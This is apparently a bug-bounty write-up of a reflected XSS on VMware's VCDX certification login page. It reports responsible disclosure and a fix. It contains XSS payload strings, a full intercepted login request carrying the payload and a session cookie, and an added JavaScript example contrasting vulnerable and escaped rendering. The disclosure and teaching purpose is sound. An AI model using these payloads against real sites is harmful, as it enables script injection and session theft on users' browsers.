VMware Official VCDX Reflected XSS

Honc
Nov 19, 2017 · 2 min read

I was browsing the bug bounty programs on HackerOne.

I wanted to try finding a vulnerability in a big enterprise first, so I chose VMware.

Before starting, check whether the VMware vulnerability policy has anything you need to pay attention to; this is something you should do before participating in any bug bounty program.

After reading VMware's vulnerability policy, there was not much to take note of (which vulnerabilities are accepted and which are not).

The only note:

In the case of vulnerabilities found in third-party software components used in VMware products, please also notify VMware as described above.

Policy: https://www.vmware.com/support/policies/security_response

------------------------

Without further ado, let's start looking for a vulnerability.

Since I use VMware products, I knew that each product has certification and expert badges and so on, and I was curious whether VMware had such a site. That is how I found this one:

Site: https://vcdx.vmware.com/

It is the VMware certification expert site!!

But there seemed to be no place to register, so I went to the login page.

Most people would start by trying a few SQL injection statements, but I didn't think too much about that! A big company is unlikely to have such an obvious flaw, and if it existed, it would have been found already.

Out of professional habit, I tried entering an XSS string: "><img src=x Onerror:alert (1)/>

I intercepted the request and modified it:

POST /login HTTP/1.1
Host: vcdx.vmware.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://vcdx.vmware.com/login
Cookie: connect.sid=s%3AwU84EnNnabqCyW98coEEFYTZLhYkitff.al1Ce9v8xNZNBnZIhvDJ8IDQzDHVDBXlgb8%2BxV%2By2gg
X-Forwarded-For: 8.8.8.8
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 75

redirectTo=&email=%22%3E%3Csvg%2Fonload%3Dalert%28domain%29%3E%22&password=

Result!!

Indeed, the payload was reflected in the response and the XSS fired; I'm sure this is a vulnerability.
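The pattern behind the bug above, as an added example that is not code from the original post or from VMware: the handler, the error-page template and the function names are assumptions; only the parameter names (redirectTo, email, password) and the payload come from the captured request. It shows the vulnerable rendering beside the HTML-encoded fix, rebuilds the exact POST body, and runs the reflection check a tester applies to the response.

```javascript
// Added example, not code from the original post or from VMware: a minimal
// Node.js reproduction of the pattern behind a reflected XSS on a login form.
// The template strings and function names are assumptions; the parameter names
// (redirectTo, email, password) and the payload come from the captured request.

// Payload from the captured request, percent-decoded.
const PAYLOAD = '"><svg/onload=alert(domain)>"';

// Build the POST body the way a browser form submission (or an intercepting
// proxy) would: application/x-www-form-urlencoded, keys in form order.
function buildLoginBody(email, password = '', redirectTo = '') {
  return new URLSearchParams({ redirectTo, email, password }).toString();
}

// Vulnerable handler: the submitted address is interpolated into the HTML of
// the "login failed" page without encoding, so the browser parses the payload
// as markup and runs the onload handler of the injected <svg> element.
function renderLoginError(email) {
  return '<p class="error">No account found for ' + email + '</p>\n' +
         '<input type="text" name="email" value="' + email + '">';
}

// Fix: HTML-encode untrusted values before they reach an HTML context.
// (A template engine with auto-escaping enabled does the same by default.)
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

function renderLoginErrorSafe(email) {
  const safe = escapeHtml(email);
  return '<p class="error">No account found for ' + safe + '</p>\n' +
         '<input type="text" name="email" value="' + safe + '">';
}

// Tester-side check: does the response body contain the payload byte-for-byte?
// A value that is reflected but encoded is not exploitable; an unencoded one is.
function isReflectedUnencoded(responseBody, payload) {
  return responseBody.includes(payload);
}

// Stand-alone run: print the rebuilt body, its length, and both outcomes.
const body = buildLoginBody(PAYLOAD);
console.log('Content-Length:', Buffer.byteLength(body), body);
console.log('vulnerable page reflects unencoded:',
  isReflectedUnencoded(renderLoginError(PAYLOAD), PAYLOAD));
console.log('fixed page reflects unencoded:    ',
  isReflectedUnencoded(renderLoginErrorSafe(PAYLOAD), PAYLOAD));
```

Run it with `node`. `buildLoginBody` reproduces the captured body exactly, including the Content-Length of 75, which is a quick way to confirm that a proxy or script encodes the payload the same way a browser would. The fix encodes for an HTML body and attribute context only; a value that lands inside a script block or a URL attribute needs the encoding for that context instead.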

Timeline

  • 2017/02/13 08:46 Provided vulnerability details to the VMware Security Team
  • 2017/02/14 11:35 Received a response from Vinay that the investigation is in progress
  • 2017/03/25 02:09 Fixed
  • 2017/03/31 05:18 Told that VMware swag would be sent as a thank-you